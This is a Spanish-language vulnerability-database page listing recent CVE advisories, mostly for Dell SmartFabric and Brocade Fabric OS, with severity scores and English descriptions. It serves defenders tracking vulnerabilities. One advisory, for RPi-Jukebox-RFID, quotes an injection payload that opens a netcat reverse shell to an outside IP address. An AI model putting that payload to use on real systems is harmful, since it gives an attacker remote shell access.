Vulnerabilidades
Resumen — últimos 7 días
Vulnerabilidades nuevas2696▼ 543 respecto a la semana anterior
Críticas / altas1264▼ 228 respecto a la semana anterior
Nueva explotación activa (KEV)4▼ 5 respecto a la semana anterior
Sin puntuar (sin CVSS)262▼ 241 respecto a la semana anterior
425 resultados, ordenados por fecha de publicación (más recientes primero)
| CVE | Estado | Severidad | EPSS | Explotación activa | Tecnologías afectadas | Publicada ▼ | Modificada | Descripción |
|---|---|---|---|---|---|---|---|---|
| Analizada | Crítica (9.1) | 0.89% | — | Dell Smartfabric Os10 | 15/2/2024 | 17/6/2026 | Dell OS10 Networking Switches running 10.5.2.x and above contain a vulnerability with zeroMQ when VLT is configured. A remote unauthenticated attacker could potentially exploit this vulnerability leading to information disclosure and a possible Denial of Service when a huge number of requests are sent to the switch.… | |
| Modificada | Crítica (9.8) | 1.6% | — | Sourcefabric Phoniebox | 19/1/2024 | 17/6/2026 | A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to… | |
| Modificada | Alta (8.1) | 0.24% | — | Broadcom Fabric Operating System | 6/12/2023 | 17/6/2026 | Brocade Fabric OS (FOS) hardware platforms running any version of Brocade Fabric OS software, which supports the license string format; contain cryptographic issues that could allow for the installation of forged or fraudulent license keys. This would allow attackers or a malicious party to forge a counterfeit license… | |
| Modificada | Media (6.5) | 0.52% | — | Hyperledger Fabric | 14/11/2023 | 17/6/2026 | Hyperledger Fabric is an open source permissioned distributed ledger framework. Combining two molecules to one another, called "cross-linking" results in a molecule with a chemical formula that is composed of all atoms of the original two molecules. In Fabric, one can take a block of transactions and cross-link the… | |
| Modificada | Alta (8.8) | 0.43% | — | Tibco HawkHawk Distribution FOR Tibco Silver FabricTibco Operational Intelligence Hawk RedtailTibco Runtime Agent | 25/10/2023 | 17/6/2026 | The Hawk Console and Hawk Agent components of TIBCO Software Inc.'s TIBCO Hawk, TIBCO Hawk Distribution for TIBCO Silver Fabric, TIBCO Operational Intelligence Hawk RedTail, and TIBCO Runtime Agent contain a vulnerability that theoretically allows an attacker with access to the Hawk Console’s and Agent’s log to obtain… | |
| Modificada | Crítica (9.8) | 0.94% | — | Dell Smartfabric Storage Software | 5/10/2023 | 17/6/2026 | Dell SmartFabric Storage Software version 1.3 and lower contain an improper input validation vulnerability. A remote unauthenticated attacker may exploit this vulnerability and escalate privileges up to the highest administration level. This is a critical severity vulnerability affecting user authentication. Dell… | |
| Modificada | Alta (8.8) | 0.84% | — | Dell Smartfabric Storage Software | 5/10/2023 | 17/6/2026 | Dell SmartFabric Storage Software v1.4 (and earlier) contains an OS Command Injection Vulnerability in the CLI use of the ‘more’ command. A local or remote authenticated attacker could potentially exploit this vulnerability, leading to the ability to gain root-level access. | |
| Modificada | Media (6.5) | 0.59% | — | Dell Smartfabric Storage Software | 5/10/2023 | 17/6/2026 | Dell SmartFabric Storage Software v1.4 (and earlier) contains an Improper Input Validation vulnerability in RADIUS configuration. An authenticated remote attacker could potentially exploit this vulnerability, leading to gaining unauthorized access to data. | |
| Modificada | Alta (7.8) | 0.16% | — | Dell Smartfabric Storage Software | 5/10/2023 | 17/6/2026 | Dell SmartFabric Storage Software v1.4 (and earlier) contains an improper access control vulnerability in the CLI. A local possibly unauthenticated attacker could potentially exploit this vulnerability, leading to ability to execute arbritrary shell commands. | |
| Modificada | Media (5.4) | 0.38% | — | Dell Smartfabric Storage Software | 5/10/2023 | 17/6/2026 | Dell SmartFabric Storage Software v1.4 (and earlier) contains possible vulnerabilities for HTML injection or CVS formula injection which might escalate to cross-site scripting attacks in HTML pages in the GUI. A remote authenticated attacker could potentially exploit these issues, leading to various injection type… | |
| Modificada | Media (6.5) | 0.61% | — | Dell Smartfabric Storage Software | 5/10/2023 | 17/6/2026 | Dell SmartFabric Storage Software v1.4 (and earlier) contains a Path Traversal Vulnerability in the HTTP interface. A remote authenticated attacker could potentially exploit this vulnerability, leading to modify or write arbitrary files to arbitrary locations in the license container. | |
| Modificada | Alta (7.8) | 0.49% | — | Dell Smartfabric Storage Software | 5/10/2023 | 17/6/2026 | Dell SmartFabric Storage Software v1.4 (and earlier) contain(s) an OS Command Injection Vulnerability in the CLI. An authenticated local attacker could potentially exploit this vulnerability, leading to possible injection of parameters to curl or docker. | |
| Modificada | Alta (8.8) | 0.94% | — | Dell Smartfabric Storage Software | 5/10/2023 | 17/6/2026 | Dell SmartFabric Storage Software v1.4 (and earlier) contains an OS Command Injection Vulnerability in the restricted shell in SSH. An authenticated remote attacker could potentially exploit this vulnerability, leading to execute arbitrary commands. | |
| Modificada | Media (4.4) | 0.27% | — | Broadcom Fabric Operating System | 31/8/2023 | 17/6/2026 | In Brocade Fabric OS before v9.2.0a, a local authenticated privileged user can trigger a buffer overflow condition, leading to a kernel panic with large input to buffers in the portcfgfportbuffers command. | |
| Analizada | Media (4.4) | 0.17% | — | Broadcom Fabric Operating System | 31/8/2023 | 17/6/2026 | A segmentation fault can occur in Brocade Fabric OS after Brocade Fabric OS v9.0 and before Brocade Fabric OS v9.2.0a through the passwdcfg command. This could allow an authenticated privileged user local user to crash a Brocade Fabric OS swith using the cli “passwdcfg --set -expire -minDiff“. | |
| Modificada | Alta (7.5) | 0.36% | — | Broadcom Fabric Operating System | 31/8/2023 | 17/6/2026 | The firmwaredownload command on Brocade Fabric OS v9.2.0 could log the FTP/SFTP/SCP server password in clear text in the SupportSave file when performing a downgrade from Fabric OS v9.2.0 to any earlier version of Fabric OS. | |
| Modificada | Media (6.3) | 0.68% | — | Cisco Firepower 9300 FirmwareCisco Firepower 4143 FirmwareCisco Firepower 4112 FirmwareCisco UCS 6324 Fabric Interconnect Firmware+4 | 23/8/2023 | 17/6/2026 | A vulnerability in the Simple Network Management Protocol (SNMP) service of Cisco FXOS Software for Firepower 4100 Series and Firepower 9300 Security Appliances and of Cisco UCS 6300 Series Fabric Interconnects could allow an authenticated, remote attacker to cause a denial of service (DoS) condition on an affected… | |
| Modificada | Media (6.5) | 3.0% | — | Redhat Enterprise LinuxXENIntel MicrocodeIntel Xeon E-2314 Firmware+530 | 11/8/2023 | 17/6/2026 | Information exposure through microarchitectural state after transient execution in certain vector execution units for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access. | |
| Modificada | Media (5.3) | 0.64% | — | Broadcom Brocade Fabric Operating System | 2/8/2023 | 17/6/2026 | An information disclosure in the web interface of Brocade Fabric OS versions before Brocade Fabric OS v9.2.0 and v9.1.1c, could allow a remote unauthenticated attacker to get technical details about the web interface. | |
| Modificada | Alta (7.1) | 0.16% | — | Broadcom Brocade Fabric Operating System | 2/8/2023 | 17/6/2026 | System files could be overwritten using the less command in Brocade Fabric OS before Brocade Fabric OS v9.1.1c and v9.2.0. | |
| Modificada | Media (6.1) | 0.48% | — | Broadcom Brocade Fabric Operating System | 2/8/2023 | 17/6/2026 | A reflected cross-site scripting (XSS) vulnerability exists in Brocade Webtools PortSetting.html of Brocade Fabric OS version before Brocade Fabric OS v9.2.0 that could allow a remote unauthenticated attacker to execute arbitrary JavaScript code in a target user’s session with the Brocade Webtools application. | |
| Modificada | Alta (7.8) | 0.17% | — | Broadcom Brocade Fabric Operating System | 2/8/2023 | 17/6/2026 | Through manipulation of passwords or other variables, using commands such as portcfgupload, configupload, license, myid, a non-privileged user could obtain root privileges in Brocade Fabric OS versions before Brocade Fabric OS v9.1.1c and v9.2.0. | |
| Modificada | Media (5.5) | 0.28% | — | Broadcom Brocade Fabric Operating System | 2/8/2023 | 17/6/2026 | A buffer overflow vulnerability in “diagstatus” command in Brocade Fabric OS before Brocade Fabric v9.2.0 and v9.1.1c could allow an authenticated user to crash the Brocade Fabric OS switch leading to a denial of service. | |
| Modificada | Media (5.5) | 0.28% | — | Broadcom Brocade Fabric Operating System | 2/8/2023 | 17/6/2026 | A buffer overflow vulnerability in “secpolicydelete” command in Brocade Fabric OS before Brocade Fabric OS v9.1.1c and v9.2.0 could allow an authenticated privileged user to crash the Brocade Fabric OS switch leading to a denial of service. | |
| Modificada | Media (5.5) | 0.18% | — | Broadcom Brocade Fabric Operating System | 2/8/2023 | 17/6/2026 | Brocade Fabric OS before Brocade Fabric OS v9.1.1c, v9.2.0 contains a vulnerability in the command line that could allow a local user to dump files under user's home directory using grep. |